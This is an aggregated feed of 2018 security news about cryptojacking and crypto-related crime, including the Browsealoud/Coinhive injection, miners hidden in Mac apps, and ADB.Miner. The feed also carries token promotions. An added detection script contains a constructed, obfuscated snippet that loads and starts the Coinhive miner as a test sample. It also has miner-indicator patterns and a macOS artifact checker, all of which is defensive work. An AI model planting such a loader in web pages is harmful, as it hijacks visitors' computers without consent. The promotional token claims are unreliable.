Cryptocurrency-mining hackers attack government websites including UK and US

Scott Helme, a UK-based security researcher, discovered that more than 4,200 websites, including several government ones, were on Sunday serving a script that mines cryptocurrency for criminals.

Hackers managed to inject Coinhive cryptocurrency-mining code into U.S. and U.K. government websites, forcing visitors’ web browsers to secretly mine cryptocurrency. As a result, innocent visitors to these compromised websites had their computers and phones commandeered to mine cryptocurrency for the criminals.

According to reports, the affected websites include those of the Information Commissioner’s Office (ICO), the Student Loans Company and the Scottish NHS helpline, among others. Helme published the full list of the 4,200-plus affected websites.

In fact, the ICO, the UK’s data protection watchdog, took its website offline after being warned that hackers were using visitors’ computers to mine cryptocurrency. The ICO said: “We are aware of the issue and are working to resolve it.”

Helme said he was alerted by a friend who received a malware warning when visiting the UK government site ico.org.uk. He found that the website was loading the Coinhive in-browser mining (cryptojacking) script, which made visitors’ machines spend their CPU time mining the digital currency Monero.

On investigating further, Helme found that several other government websites from various countries, including uscourts.gov, gmc-uk.gov, nhsinform.scot and manchester.gov.uk, had also started serving a Coinhive miner.

The injected code was a tampered copy of Browsealoud, a widely used text-to-speech accessibility script that helps blind and partially sighted people use the web. Every site that embedded the script from Texthelp’s servers executed whatever that one file contained, which is how a single compromise spread to thousands of sites.

British tech company Texthelp, which makes the plug-in, confirmed that the Browsealoud script was compromised but that no other Texthelp services were affected.

In a statement, Martin McKay, Texthelp’s Chief Technology Officer (CTO), said the compromise was a criminal act and that an investigation is underway.

“Users who visit the hacked sites will immediately have their computers’ processing power hijacked to mine cryptocurrency – potentially netting thousands for those responsible. Government websites continue to operate securely.

“The company has examined the affected file thoroughly and can confirm that it did not redirect any data, it simply used the computers’ CPUs to attempt to generate cryptocurrency,” it said.

“The Browsealoud service has been temporarily taken offline and the security breach has already been addressed, however Browsealoud will remain offline until Tuesday 12.00 GMT.

“At this stage there is nothing to suggest that members of the public are at risk.”

Talking about the attack, Helme said, “This type of attack isn’t new – but this is the biggest I’ve seen. A single company being hacked has meant thousands of sites impacted across the UK, Ireland and the United States.

“Someone just messaged me to say their local government website in Australia is using the software as well.”

A spokesperson for the National Cyber Security Centre (NCSC) said: “NCSC technical experts are examining data involving incidents of malware being used to illegally mine cryptocurrency.

“The affected service has been taken offline, largely mitigating the issue. Government websites will continue to operate securely. At this stage there is nothing to suggest that members of the public are at risk.”

The post Hackers hijack government websites with cryptocurrency mining malware appeared first on TechWorm.

4K+ Websites Infected with Crypto-Miner after Tech Provider Hacked

Bad actors secretly infected more than 4,000 websites with the script for a crypto-miner after hacking a single technology provider. The trouble started on 11 February when Ian Thornton-Trump encountered something concerning while visiting the website for the UK Information Commissioner’s Office (ICO). Just visiting #ICO page this morning and have some concerns. Can someone […]

The post 4K+ Websites Infected with Crypto-Miner after Tech Provider Hacked appeared first on The State of Security.

Stability Means Usability for Cryptocurrencies

When Satoshi Nakamoto launched Bitcoin in 2009, he created a digital currency intended to facilitate peer-to-peer (p2p) transactions: a borderless, independent currency that would not be subject to the rules and regulations of governments and central banks. Born out of the 2008 financial crisis and the search for a better way to handle money in the digital age, Bitcoin in many ways became an incredible success.

At least, that’s how many early investors felt as the digital currency swelled in value in 2017. However, for all of its acclaim, Bitcoin has functioned as a digital investment vehicle, more akin to digital gold, than a functional currency.

After all, nobody wants to face the same fate as Laszlo Hanyecz, who purchased two pizzas for 10,000 Bitcoin in 2010. After Bitcoin’s meteoric rise in 2017, those 10,000 coins were worth well over $100 million at the December peak. In other words, nobody wants to make purchases with a currency that fluctuates as frequently and drastically as Bitcoin and other cryptocurrencies often do.

An Unstable Investment Market

Cryptocurrency prices are radical and irrational. They can be nauseating to the uninitiated, and they make it challenging to use cryptocurrencies practically. For example, just before Christmas 2017, crypto markets dropped by nearly 30% in only a few hours. Investors got proverbial whiplash when, within the day, the markets had mostly recovered their value, and they then tacked on an additional 25% over the following weeks.

This event wasn’t an aberration. In 2017, Bitcoin fell 30% or more on five separate occasions.

These dynamic price fluctuations are common in crypto markets. In fact, they are one of its most defining features. Cryptocurrencies are popular, practical, but incredibly unstable.

A Stable Solution

As a result, some projects have set out to create more stable cryptocurrencies that would be more functional on account of that stability. These currencies, dubbed stable coins, tie their value to a tangible asset or investment so that their price is not susceptible to the wild fluctuations of cryptocurrency markets.

Tether is a much hyped and hugely controversial expression of a stable coin.

To achieve greater stability and liquidity, Tether pegs its token to the U.S. dollar one-to-one. According to its Proof of Funds report, “Each Tether token is backed 100% by fiat currency in Tether Limited’s reserve bank account.” Because every token was supposed to correspond to a real dollar held in reserve, the theory was that Tether’s price would stay stable.

The idea was reasonable enough, but its implementation has come under scrutiny. Tether endured several embarrassing events in 2017 that brought increased examination of its claims. Later in the year, Tether severed ties with its independent auditor, and in December it was served a records subpoena by the Commodity Futures Trading Commission.

Ways to Tether

However, there are other stable coins available that can more accurately and authentically stabilize the value of a cryptocurrency.

Kowala’s kUSD token is pegged to the price of the U.S. dollar. According to the project, its protocol adjusts the token algorithmically within seconds of a change in its market price against the dollar. kUSD is not backed by fiat reserves, so it keeps the same decentralised character as other cryptocurrencies.

https://www.youtube.com/embed/9XB67qwz48M

In this way, Kowala is providing a stable cryptocurrency that is better equipped to fulfill Nakamoto’s original vision for digital currency: to buy things. A kUSD holder could confidently make a purchase with the digital currency without concern that it would radically change in value. In our digital-first culture, this feels like a natural expression and use case for digital currencies.

Fortunately, although they are relatively new, cryptocurrency markets are incredibly diverse. It’s good that Bitcoin attracts so much attention and money, and it’s even better that there is a broad market of alternative currencies that can fulfill other niche needs. Unfortunately, the hundreds of alt-coins share one quality: they are incredibly volatile. Stable coins like Kowala stand apart and serve an important role in the complex crypto ecosystem. They make it usable and reliable. It’s a fundamental concept that’s as old as money itself.

The post Stability Means Usability for Cryptocurrencies appeared first on TechWorm.

Weekly Cyber Risk Roundup: Cryptocurrency Attacks and a Major Cybercriminal Indictment

Cryptocurrency continued to make headlines this past week for a variety of cybercrime-related activities.

For starters, researchers discovered a new cryptocurrency miner, dubbed ADB.Miner, that infected nearly 7,000 Android devices such as smartphones, televisions and tablets over a several-day period. The researchers said the malware spreads through the Android Debug Bridge (ADB) interface exposed on TCP port 5555 and that it has Mirai code within its scanning module.

In addition, several organizations reported malware infections involving cryptocurrency miners. Four servers at a wastewater facility in Europe were infected with malware designed to mine Monero, and the incident is the first ever documented mining attack to hit an operational technology network of a critical infrastructure operator, security firm Radiflow said. In addition, Decatur County General Hospital recently reported that cryptocurrency mining malware was found on a server related to its electronic medical record system.

Reuters also reported this week on allegations by South Korea that North Korea had hacked into unnamed cryptocurrency exchanges and stolen billions of won. Investors in the Bee Token ICO were also duped after scammers sent phishing messages to the token’s mailing list claiming that a surprise partnership with Microsoft had been formed and that those who contributed to the ICO in the next six hours would receive a 100% bonus.

All of the recent cryptocurrency-related cybercrime headlines have led some experts to speculate that the use of mining software on unsuspecting users’ machines, or cryptojacking, may eventually surpass ransomware as the primary money maker for cybercriminals.


Other trending cybercrime events from the week include:

  • W-2 data compromised: The City of Pittsburg said that some employees had their W-2 information compromised due to a phishing attack. The University of Northern Colorado said that 12 employees had their information compromised due to unauthorized access to their profiles on the university’s online portal, Ursa, which led to the theft of W-2 information. Washington school districts are warning that an ongoing phishing campaign is targeting human resources and payroll staff in an attempt to compromise W-2 information.
  • U.S. defense secrets targeted: The Russian hacking group known as Fancy Bear successfully gained access to the email accounts of contract workers related to sensitive U.S. defense technology; however, it is uncertain what may have been stolen. The Associated Press reported that the group targeted at least 87 people working on militarized drones, missiles, rockets, stealth fighter jets, cloud-computing platforms, or other sensitive activities, and as many as 40 percent of those targeted ultimately clicked on the hackers’ phishing links.
  • Financial information stolen: Advance-Online is notifying customers that their personal and financial information stored on the company’s online platform may have been subject to unauthorized access from April 29, 2017 to January 12, 2018. Citizens Financial Group is notifying customers that their financial information may have been compromised due to the discovery of a skimming device found at a Citizens Bank ATM in Connecticut. Ameriprise Financial is notifying customers that one of its former employees has been calling its service center and impersonating them by using their name, address, and account numbers.
  • Other notable events:  Swisscom said that the “misappropriation of a sales partner’s access rights” led to a 2017 data breach that affected approximately 800,000 customers. A cloud repository belonging to the Paris-based brand marketing company Octoly was erroneously configured for public access and exposed the personal information of more than 12,000 Instagram, Twitter, and YouTube personalities. Ron’s Pharmacy in Oregon is notifying customers that their personal information may have been compromised due to unauthorized access to an employee’s email account. Partners Healthcare said that a May 2017 data breach may have exposed the personal information of up to 2,600 patients. Harvey County in Kansas said that a cyber-attack disrupted county services and led to a portion of the network being disabled. Smith Dental in Tennessee said that a ransomware infection may have compromised the personal information of 1,500 patients. Fresenius Medical Care North America has agreed to a $3.5 million settlement to settle potential HIPAA violations stemming from five separate breaches that occurred in 2012.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of those “newly seen” targets, meaning they either appeared in SurfWatch Labs’ data for the first time or else reappeared after being absent for several weeks, are shown in the chart below.

[Chart: newly seen targets in SurfWatch Labs data, week ending 2018-02-10]

Cyber Risk Trends From the Past Week

A federal indictment charging 36 individuals for their role in a cybercriminal enterprise known as the Infraud Organization, which was responsible for more than $530 million in losses, was unsealed this past week. Acting Assistant Attorney General Cronan said the case is “one of the largest cyberfraud enterprise prosecutions ever undertaken by the Department of Justice.”

The indictment alleges that the group engaged in the large-scale acquisition, sale, and dissemination of stolen identities, compromised debit and credit cards, personally identifiable information, financial and banking information, computer malware, and other contraband dating back to October 2010. Thirteen of those charged were taken into custody in countries around the world.

As the Justice Department press release noted:

Under the slogan, “In Fraud We Trust,” the organization directed traffic and potential purchasers to the automated vending sites of its members, which served as online conduits to traffic in stolen means of identification, stolen financial and banking information, malware, and other illicit goods.  It also provided an escrow service to facilitate illicit digital currency transactions among its members and employed screening protocols that purported to ensure only high quality vendors of stolen cards, personally identifiable information, and other contraband were permitted to advertise to members.

ABC News reported that investigators believe the group’s nearly 11,000 members targeted more than 4.3 million credit cards, debit cards, and bank accounts worldwide. Over its seven-year history, the group inflicted $2.2 billion in intended losses and more than $530 million in actual losses against a wide range of financial institutions, merchants, and individuals.

Italian cryptocurrency exchange BitGrail loses $170 million

One of the biggest problems with cryptocurrency exchanges is that they're a juicy, enticing target for high-tech criminals. Case in point: Italian exchange BitGrail, which lost $170 million worth of Nano tokens, a little-known digital coin previously called RaiBlocks. BitGrail is the second exchange to lose a massive amount of money this year, and it's only February, following Tokyo-based Coincheck, which lost between $400 million and $534 million worth of coins in January in an attack on its internet-connected (hot) wallet.

Source: The Wall Street Journal

Russian Scientists Arrested for Using Nuclear Weapon Facility to Mine Bitcoins

Two days ago when infosec bods claimed to have uncovered what's believed to be the first case of a SCADA network (a water utility) infected with cryptocurrency-mining malware, a batch of journalists accused other authors of making fear-mongering headlines, taunting that the next headline could be about cryptocurrency-miner detected in a nuclear plant. It seems that now they have to run a

Webroot Threat Blog: Cyber News Rundown: Scarab Ransomware Strikes Back

The Cyber News Rundown brings you the latest happenings in cybersecurity news weekly. Who am I? I’m Connor Madsen, a Webroot Threat Research Analyst and a guy with a passion for all things security. Any questions? Just ask.

New Variant of Scarab Ransomware

With a few interesting changes to the original Scarab ransomware, Scarabey is quickly targeting Russian-speaking users with brute force attacks on unsecured RDP connections, rather than with the spam email campaigns used by its predecessor. Additionally, Scarabey takes the ransom a bit further by deleting 24 files from the encrypted machine for every 24 hours that the ransom remains unpaid.

Botnets Used to Spread Cryptocurrency Miners

Following the Shadow Brokers’ 2017 release of NSA exploits, EternalBlue remains in use, the latest trend being to compromise machines with it and turn them into cryptocurrency miners. By expanding the botnet to cover over 500,000 unique machines, the attackers have brought in more than $3 million since May 2017. A botnet of that scale can mine the more resource-intensive currencies with ease and can even disrupt businesses’ normal workflow for days at a time.

Bitcoin Ads Circumvent Facebook Ban

In the past week, Facebook officially implemented a ban on all cryptocurrency-related advertisements on their site. However, the ads have continued to appear for many users with characters in the phrase ‘bitcoin’ simply misspelled. The ban was initially set to block misleading financial services and products that unknowing users might click on due to the apparent legitimacy of the ads.

Mac Software Sites Distributing Crypto Miners

As crypto miners continue to gain popularity among cyber criminals, it was inevitable that they would begin focusing on Macs. MacUpdate, a well-known software download site, was recently found to be bundling miners with commonly used applications. Luckily, some of these bundles are poorly written and often fail to launch the decoy app, which is intended to draw users’ attention away from the malicious activity. To make matters worse, several other download sites were also affected and waited far too long to remove the malicious download links from their servers.

Tech Scammers Exploit Chrome Flaw

Tech scammers have long been the bane of legitimate software companies and their support teams. The latest trick, however, can easily bring an unsuspecting user to a full panic attack by simply rendering a Chrome browser completely unusable. First it displays an error message and then silently forces the browser to save a random file to disk at such a pace that the machine’s CPU maxes out and leaves the computer in a ‘locked’ state in the hopes that the victim will actually contact the phony support number being displayed.

The post Cyber News Rundown: Scarab Ransomware Strikes Back appeared first on Webroot Threat Blog.


New Deepfakes forum goes mining with Coinhive

You may or may not be familiar with the furore over Deepfakes, a relatively new development in pornography involving a tool called FacesApp, which can produce a realistic porn clip in which the original actors’ heads are replaced with those of celebrities, or indeed anyone at all.

Online fakes have been around since the early 2000s or possibly even earlier; alongside those old photos, fakers would also make the odd terrible porno flick. Those movies would quite literally be a static cut out of a celebrity’s head stuck onto the body. Some 20 years later, the tech has caught up, and the web is suddenly dealing with the fallout.

FacesApp allows people to “train” an AI to create a realistic head so the scene is practically indistinguishable from reality. The AI is trained by feeding it images or footage of people; the more data it has to go off, the more realistic everything is.

After a media firestorm, the inevitable has happened. All of the Deepfake subreddits, where the majority of content was being created, have been taken offline after major players such as Twitter and PornHub had already effectively banned Deepfake content from their networks.

The Deepfake tech is available for pretty much anyone to make use of—the only real barrier to entry is having a powerful PC capable of withstanding the intensive training process, which can take hours or days to complete.

Now, if you were a crafty cybercriminal and knew that the main Deepfakes sources were taken offline, with a sizable community of content consumers and creators with heavy-duty PC rigs suddenly set adrift, what would you do?

The answer, of course, is to monetize potentially dubious fakes that you didn’t create yourself and hammer visitors’ PCs with mining scripts.

One of the most popular “lifeboat” sites we’ve seen for those unceremoniously dumped from the tender embrace of reddit was being promoted pretty heavily on surviving subreddits:

[Screenshot: promo messages]

On the surface, it looks like a fairly typical forum, and it’s been getting a fair bit of activity so far. It all looks legit—or at least as legit as can be given the controversial content on offer:

[Screenshot: Deep...coins?]

A quick check of the source code, while your CPU likely ramps up to 100 percent, would tell a slightly different story:

[Screenshot: miner code]

We have some JavaScript located at:

/mybbalertsjs(dot)min(dot)js

Sure, you could try to make sense of it as is. Or, you could just unpack it instead and save yourself a headache because that is a large, confusing pile of code. What is it doing?

[Screenshot: miner function]

var Miner=function

…miner…function? Did this site place mining scripts in the background?

[Screenshot: coinhive]

self.CoinHive.CONFIG=

They sure did, and we block both the mining and the website in question.

[Screenshot: blocked]

Coinhive is something we’ve been blocking since October. It allows you to place cryptocurrency mining scripts on your webpage, similar to how regular adverts are placed, except it’ll try to make as much use of your machine as possible to whip up some Monero coins for the site owner. Here’s an example of a site pushing a PC to the limit via mining scripts in the background. Check out the resources being gobbled up on the right-hand side:

[Screenshot: Ramping up]
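The indicators pulled out of the unpacked forum script above (`var Miner=function`, `self.CoinHive.CONFIG=`) are easy to turn into a detection. Below is an added example, not code from Malwarebytes or from Coinhive, that scans script source for those strings together with the Coinhive loader URL and its public `CoinHive.Anonymous(siteKey)` API, after undoing simple string hiding. The three sample scripts and the site key are constructed for the example; the forum’s actual script is not reproduced.

```javascript
// Added example, not code from the Malwarebytes post or from Coinhive: a scanner
// that flags the in-browser miner indicators the post surfaced after unpacking the
// forum's script ("var Miner=function", "self.CoinHive.CONFIG=") together with the
// Coinhive loader URL and its public CoinHive.Anonymous(siteKey) API.
// All sample scripts below are constructed for the example; the site key is made up.

const INDICATORS = [
  // The library was loaded from this path on Coinhive's own domain.
  { name: 'coinhive-loader', re: /coinhive\.com\/lib\/coinhive\.min\.js/i },
  // Public API / config object; \W{1,4} tolerates both dot access and ["..."]["..."] access.
  { name: 'coinhive-api', re: /CoinHive\W{1,4}(Anonymous|User|Token|CONFIG)\b/ },
  // Constructor name seen in the unpacked library.
  { name: 'miner-constructor', re: /\bvar\s+Miner\s*=\s*function\b/ },
];

// Site key passed to CoinHive.Anonymous(); it identifies who gets paid for the hashes.
const SITE_KEY_RE = /CoinHive\W{1,4}Anonymous\W{1,4}['"]([A-Za-z0-9]{8,})['"]/;

// Undo the cheapest string-hiding tricks before matching: \xHH and \uHHHH escapes
// and "Coin" + "Hive" style string splitting. This is not a full deobfuscator.
function deobfuscate(src) {
  return src
    .replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/(['"])\s*\+\s*\1/g, '');
}

// Scan one script body; returns the indicators hit, a verdict and the site key if present.
function scanScript(src) {
  const text = deobfuscate(src);
  const hits = INDICATORS.filter((i) => i.re.test(text)).map((i) => i.name);
  const key = text.match(SITE_KEY_RE);
  let verdict = 'clean';
  if (hits.length === 1) verdict = 'suspicious'; // one indicator: review by hand
  if (hits.length >= 2) verdict = 'miner';       // two independent indicators
  return { hits, verdict, siteKey: key ? key[1] : null };
}

// Constructed sample 1: what a legitimate MyBB alerts script might contain.
const BENIGN = 'window.MyBBAlerts = { poll: function () { /* fetch alerts */ } };\n';

// Constructed sample 2: the pattern the post describes, a miner library appended to
// the plugin script (identifiers only, not the real Coinhive code).
const APPENDED_MINER = BENIGN +
  'var Miner=function(siteKey,params){ /* worker pool */ };\n' +
  'self.CoinHive.CONFIG={LIB_URL:"https://coinhive.com/lib/"};\n';

// Constructed sample 3: the same behaviour with the API name hidden in hex escapes
// (String.raw keeps the backslashes literal, as they would appear in the source).
const OBFUSCATED = BENIGN + String.raw`
var s=document.createElement("script");s.src="https://coinhive.com/lib/coinhive.min.js";
document.head.appendChild(s);
new window["\x43\x6f\x69\x6e\x48\x69\x76\x65"]["Anonymous"]("constructedkey00112233",{throttle:0.1}).start();
`;

module.exports = { deobfuscate, scanScript, BENIGN, APPENDED_MINER, OBFUSCATED };
```

Two independent indicators give a “miner” verdict; one alone is only “suspicious”, because `Miner` is a common enough name to appear in unrelated code. Reporting the site key is worth the extra line: Coinhive credited hashes to the account behind that key, so the same key turning up on unrelated sites ties the injections to one operator.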

In an age of people leaving dozens of tabs open and going for dinner, websites running scripts that ramp you up to 100 percent CPU usage and generate a fair bit of heat in the bargain just aren’t my thing. Now that we have DIY fake porn tech which demands high system specs and also has people simultaneously making content as well as downloading it, they’re prime targets for a spot of potentially surreptitious cryptomining taking place behind the scenes.

We’ve seen a few mentions of other Deepfake aficionados complaining about dodgy sites, and we’ll be taking a closer look to see what’s out there. All in all, you’re probably better off steering clear of the whole mess and taking up a less stress-inducing hobby (for you and your computer).

Keep your security tools up to date, make informed decisions about what you want to block, and keep those CPU temperatures down to a minimum!

The post New Deepfakes forum goes mining with Coinhive appeared first on Malwarebytes Labs.

Water Utility Infected by Cryptocurrency Mining Software

A water utility in Europe has been infected by cryptocurrency mining software. This is a relatively new attack: hackers compromise computers and force them to mine cryptocurrency for them. This is the first time I've seen it infect SCADA systems, though.

It seems that this mining software is benign, and doesn't affect the performance of the hacked computer. (A smart virus doesn't kill its host.) But that's not going to always be the case.

Earn Tradable Cryptocurrencies by Patronizing your Favourite Businesses

Customer relations are an essential part of every business. For the sake of sustainability, businesses must strive for repeat customers, in other words customers who are loyal to their brands.

Limitations of suspended rewards

The typical business environment is littered with different forms of loyalty programs that are aimed at encouraging customers to return for more business. Other aspects of such programs are targeted towards receiving feedbacks from these customers for purposes of brand management and improvement. However, in today’s era where processes are ruled by increased dynamism, it is difficult to hold on to customers with mere promises of suspended value. Besides, following up on numerous loyalty programs from the various vendors than an individual patronizes can be exhaustive and confusing.

Most businesses today do not get the expected responses from their customers in terms of feedback. Unlike like several years ago when the world was generally slower, millennials these days hardly have the luxury of time to fill out forms especially over the internet. In most cases, the ones who make out time to give feedbacks are usually dissatisfied customers, hence not representing the true reflection of service or product delivery. By introducing blockchain and incentivized processes, the feedback mechanism will definitely function better. Beyond just a profitable exercise, customers will feel more respected and appreciated rather than just being used.

Beyond feedback delivery as a medium of loyalty, several companies already provide some extra incentives. The complication comes from how cumbersome it usually is to claim such incentives. Most times they come as suspended benefits rather than real-time, immediate value.

A rallying point for every business

By creating a unifying platform, Sandblock is using blockchain technology to provide immediate value in terms of loyalty programs.

With the emerging trend where all the major brands in the world are now starting to look into the blockchain technology for their future developments, it is only a matter of time before each one of those brands will start using the blockchain to tighten the relationship with their customers. When this happens, you can only imagine the number of tokens an individual can hold with respect to the various businesses that they patronize.

Sandblock’s protocol is designed as a centre of gravity that can serve as a rallying point for an infinite number of tokens. On this platform, users can trade their tokens which they must have acquired from their various vendors, including loyalty tokens.

An effective utility token

All this will revolve around Sandblock’s ERC20 satisfaction (SAT) token. This will function as a consortium token in order to ensure the cohesiveness of the ecosystem, which will be comprised of businesses of various sizes. Every other business can then create its own peculiar tokens off the SAT based on Sandblock’s protocol. This will enable all players to communicate, exchange and benefit from the collaboration efforts that they choose to engage in.

The existing loyalty systems have the tint of an arm-twisting exercise, because to enjoy these benefits, customers in most cases must return to the same business. This sometimes feels like blackmail, because failing to return automatically implies forfeiture of such benefits. By receiving rewards in tradable tokens, customers will retain control of their value, since the tokens can be easily exchanged within the ecosystem. However, it will also serve as a wake-up call to businesses, who will have to sit up, hence the introduction of healthy competition.

The post Earn Tradable Cryptocurrencies by Patronizing your Favourite Businesses appeared first on TechWorm.

Hospital warns 24,000 patients that its EMR system was hacked to mine cryptocurrency

Hackers are increasingly setting their sights on electronic medical records (EMR) to extort money from hospitals and their affiliated system vendors. Most recently, one hospital has seen its EMR service hijacked to mine cryptocurrency.

On January 26, Parsons, Tennessee-based Decatur County General Hospital started notifying customers that its EMR vendor was compromised by a hacker who injected cryptocurrency mining malware into its systems.

“On November 27, 2017, we received a security incident report from our EMR system vendor indicating that unauthorized software had been installed on the server the vendor supports on our behalf,” reads the DCGH notice. “The unauthorized software was installed to generate digital currency, more commonly known as ‘cryptocurrency.’”

An investigation revealed the attacker infected the servers remotely some time in September. However, the hospital was only notified of the breach two months later, which is highly unorthodox considering that the attackers could have (and potentially might have) compromised the sensitive information of tens of thousands of patients.

It is unclear how much cryptocurrency was generated for the attacker(s) as part of the hack, but DCGH says “the EMR vendor replaced the server and operating about four days later [following the breach].”

The hospital says information on the affected server included patient names, addresses, dates of birth, Social Security numbers, diagnosis and treatment data, and insurance billing information.

On the good side, while the investigation into the breach continues, DCGH claims (so far) it has no evidence that patient information was acquired or viewed by unauthorized parties.

“Based upon reports of similar incidents, we do not believe that your health information was targeted by any unauthorized individual installing the software on the server,” reads the reassuring notice.

The growing popularity of cryptocurrency has spawned huge interest in cryptocurrency miners and ransomware. Digital currency is highly untraceable, while at the same time it can be generated out of thin air by hacking and using other people’s computers to ‘mine’ new coins.

For the curious, the cryptocurrency mined with the hacked EMR vendor’s systems was reportedly Dash. According to the World Coin Index, which tracks the fluctuating values of all cryptocurrencies in existence, Dash is the fourth-most valuable cryptocurrency per unit, currently trading at 557 USD.

For comparison, one Ethereum is $820, BitcoinCash sells for just over $1,000, and the almighty Bitcoin – which two months ago stood at almost $20,000 per unit – is now worth $8,200.

Cryptomining Software Discovered on Tennessee Hospital’s EMR Server

A Tennessee hospital discovered cryptomining software installed on a server that hosts its electronic medical records (EMR) system. In January 2018, Decatur County General Hospital began notifying patients of an incident involving its electronic medical record systems. Its breach notification letter (PDF) reveals the hospital first learned about the security event from its EMR vendor: […]… Read More

The post Cryptomining Software Discovered on Tennessee Hospital’s EMR Server appeared first on The State of Security.

What can businesses learn from the cyber threat landscape of 2017?

Over the course of 2017, global cyber threats continued to evolve at pace, resulting in a dramatic reshaping of the cyber security landscape. Traditional threats such as generic Trojans, ransomware

The post What can businesses learn from the cyber threat landscape of 2017? appeared first on The Cyber Security Place.

Japanese Teenager Arrested For Creating Cryptocurrency Stealing Malware

17-year-old arrested in Japan for developing malware that steals cryptocurrency wallet passwords

A 17-year-old school boy has been arrested by the Japanese police on suspicion of creating a computer virus that steals private keys (passwords) to wallets of cryptocurrency users, specifically targeting MonaCoin wallets.

For those unaware, MonaCoin (MONA) is a decentralized, open-source cryptocurrency launched in Japan in the year 2014. It is also advertised as “the first Japanese cryptocurrency,” and is currently ranked 88th on CoinMarketCap based on market value. At present, one MonaCoin is equivalent to almost $4 and 434 Yen.

The teenager, a third-year high school student in Kaizuka, Osaka Prefecture, was arrested on Tuesday (January 30, 2018) by Aichi Prefectural Police for allegedly creating illegal electromagnetic records and using them, reports local Japanese news website Mainichi. He hid the malware he created inside an application for viewing cryptocurrency market data in real time. In reality, the malware app stole passwords for MonaCoin wallets.

According to the arrest warrant, the teenager had shared the trojanized app on an online bulletin board frequented by MonaCoin users on October 10th 2017 under the guise of helping them monitor cryptocurrency market prices. On questioning by the police, the teen defended himself by stating that “I didn’t do it with malicious intent.”

After the teen shared the malicious app online, it was immediately downloaded and installed by a 31-year-old man from Tokyo. Shortly after the installation, this man discovered that 170 MonaCoins (around $500) had gone missing from his wallet. While there were a series of posts on the bulletin board warning others to be careful about the suspicious “software”, it was too late for the man by then.

The teenager, whose name has not been revealed yet, is under investigation for using the passwords to steal funds from victims. The police are also investigating whether the teen targeted other unsuspecting users and whether he stole more funds, as they believe that the number of victims is likely much higher. However, no charges have been filed yet.

Recently, Coincheck, a Japan-based cryptocurrency exchange, was hit by the biggest hack in the history of cryptocurrency in which 58 billion Yen ($534 million) worth of the virtual currency “NEM (Nemu)” was stolen from its digital wallets.

The post Japanese Teenager Arrested For Creating Cryptocurrency Stealing Malware appeared first on TechWorm.

Running Firefox, OnyX or Deeper on your Mac? You might be mining cryptocurrency for a hacker

Three widely used Mac apps infected with cryptocurrency miners have been flagged by security researchers this week. The programs, distributed through third-party aggregators (i.e. not the official Mac App Store), need to be immediately uninstalled if users are to stay out of harm’s way.

Earlier this week, researchers found fake or otherwise modified versions of Mozilla’s Firefox web browser, as well as system tools OnyX and Deeper, infected with cryptocurrency-mining malware targeting Macs. The modified apps were distributed through MacUpdate, a third-party Mac software aggregator.

Deeper is a personalization utility and OnyX is a popular maintenance tool. Both apps were created by veteran development studio Titanium Software.

Dubbed OSX.CreativeUpdate, the malware spread through hacked pages on MacUpdate. OSX.CreativeUpdate is a Trojan that, once installed, downloads its cryptocurrency mining component. The miner hijacks the Mac’s processor to generate digital “coins” that go straight to the attacker’s wallet.

A spokesperson for MacUpdate confirms the hack in a comment on all three infected download pages.

“If you have installed-and-run Firefox 58.0.2, OnyX, or Deeper since 1 February 2018, please accept my apologies, but you will need to follow these steps to remove a bitcoin miner which hacked versions of those apps,” writes the person, identified only as Jess. “This is not the fault of the respective developers, so please do not blame them. The fault is entirely mine for having been fooled by the hackers.”

In short, if you’ve downloaded any of these three apps through MacUpdate as of late, you need to trash them.

However, just deleting the app binaries is not enough. As power users should know, when new software is installed, MacOS makes room for additional application resources in different parts of the system – specifically, the Library folder. So, even if you delete the app itself, some leftovers might remain in this directory.

Case in point – according to Jess, users need to follow these exact steps to eliminate any potential infection with OSX.CreativeUpdate:

  • Delete any copies of the above titles you might have installed.
  • Download and install fresh copies of the titles.
  • In Finder, open a window for your home directory (Cmd-Shift-H).
  • If the Library folder is not displayed, hold down the Option/Alt key, click on the “Go” menu, and select “Library (Cmd-Shift-L)”.
  • Scroll down to find the “mdworker” folder (~/Library/mdworker/).
  • Delete the entire folder.
  • Scroll down to find the “LaunchAgents” folder (~/Library/LaunchAgents/).
  • From that folder, delete “MacOS.plist” and “MacOSupdate.plist” (~/Library/LaunchAgents/MacOS.plist and ~/Library/LaunchAgents/MacOSupdate.plist).
  • Empty the Trash.
  • Restart your system.
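The removal steps above can be turned into a quick read-only check. The script below is an added example and is not part of the MacUpdate post or Bitdefender’s article; it looks in a given home directory for the on-disk artifacts those steps name (the ~/Library/mdworker folder and the two LaunchAgents plists) and reports which are present without deleting anything, so it can be run before and after the cleanup.

```shell
#!/bin/sh
# Added example: check a home directory for the on-disk artifacts named in the
# OSX.CreativeUpdate removal steps. Report only; nothing is deleted.
# Usage: check_creativeupdate_artifacts [HOME_DIR]   (defaults to $HOME)
# Exit status: 0 = none of the artifacts present, 1 = at least one present.

check_creativeupdate_artifacts() {
    home="${1:-$HOME}"
    found=0
    # Paths taken from the removal instructions above.
    for artifact in \
        "$home/Library/mdworker" \
        "$home/Library/LaunchAgents/MacOS.plist" \
        "$home/Library/LaunchAgents/MacOSupdate.plist"
    do
        if [ -e "$artifact" ]; then
            printf 'FOUND: %s\n' "$artifact"
            found=$((found + 1))
        fi
    done
    if [ "$found" -eq 0 ]; then
        return 0
    fi
    printf '%d artifact(s) present; follow the removal steps, then re-run.\n' "$found" >&2
    return 1
}

# Scan the current user's home when the script is run with --scan.
if [ "${1:-}" = "--scan" ]; then
    check_creativeupdate_artifacts "$HOME" && echo "No OSX.CreativeUpdate artifacts found."
fi
```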

The web site says it already fixed the pages for Firefox, OnyX and Deeper. A lot of Mac owners make use of the vast software library that is MacUpdate. However, we advise downloading your third-party software either from the developer’s web site or through Apple’s curated Mac App Store. For more peace of mind, run Bitdefender Antivirus for Mac, which classifies cryptocurrency miners as malware and blocks them as such.

E Hacking News – Latest Hacker News and IT Security News: A New Botnet Targeting to Infect Android Devices with Malware that Mines the Monero Cryptocurrency

Another botnet showed up over the weekend, on Saturday, February 3, focused entirely on Android devices and specifically on port 5555, which on devices running the Android OS is the port used by the operating system's native Android Debug Bridge (ADB), a debugging interface that grants access to some of the operating system's most sensitive features.

The botnet scans for open debug ports so that it can infect victims with malware that mines the Monero cryptocurrency.

According to security researchers from Qihoo 360's Network Security Research Lab (Netlab), who discovered the botnet and named it ADB.miner, only devices running the Android OS, such as smartphones, smart TVs and TV set-top boxes, have been infected so far.

